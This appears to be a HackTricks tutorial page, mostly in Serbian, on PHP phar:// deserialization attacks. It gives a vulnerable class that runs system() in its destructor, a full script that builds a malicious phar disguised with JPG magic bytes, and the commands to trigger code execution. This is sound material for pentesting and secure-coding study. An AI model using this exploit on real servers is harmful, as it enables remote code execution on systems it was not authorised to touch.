5.1 KiB
phar:// deserialization
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Bug bounty tip: prijavite se za Intigriti, premium bug bounty platformu koju su kreirali hakeri, za hakere! Pridružite nam se na https://go.intigriti.com/hacktricks danas, i počnite da zarađujete nagrade do $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Phar datoteke (PHP Archive) sadrže meta podatke u serijalizovanom formatu, tako da, kada se analiziraju, ovi meta podaci se deserijalizuju i možete pokušati da iskoristite vulnerabilnost deserijalizacije unutar PHP koda.
Najbolja stvar u vezi sa ovom karakteristikom je da će se ova deserijalizacija dogoditi čak i korišćenjem PHP funkcija koje ne izvršavaju PHP kod kao što su file_get_contents(), fopen(), file() ili file_exists(), md5_file(), filemtime() ili filesize().
Dakle, zamislite situaciju u kojoj možete naterati PHP veb da dobije veličinu proizvoljne datoteke koristeći phar://
protokol, i unutar koda pronađete klasu sličnu sledećoj:
{% code title="vunl.php" %}
<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}
function __destruct() {
system($this->data);
}
}
filesize("phar://test.phar"); #The attacker can control this path
{% endcode %}
Možete kreirati phar datoteku koja će, kada se učita, iskoristiti ovu klasu za izvršavanje proizvoljnih komandi sa nečim poput:
{% code title="create_phar.php" %}
<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}
function __destruct() {
system($this->data);
}
}
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();
{% endcode %}
Obratite pažnju na to kako su magične bajtove JPG (\xff\xd8\xff
) dodate na početak phar datoteke kako bi se zaobišle moguće restrikcije upload-a datoteka.
Kompajlirajte test.phar
datoteku sa:
php --define phar.readonly=0 create_phar.php
I izvršite komandu whoami
zloupotrebljavajući ranjivi kod sa:
php vuln.php
References
{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}
Bug bounty tip: prijavite se za Intigriti, premium bug bounty platformu koju su kreirali hakeri, za hakere! Pridružite nam se na https://go.intigriti.com/hacktricks danas, i počnite da zarađujete nagrade do $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.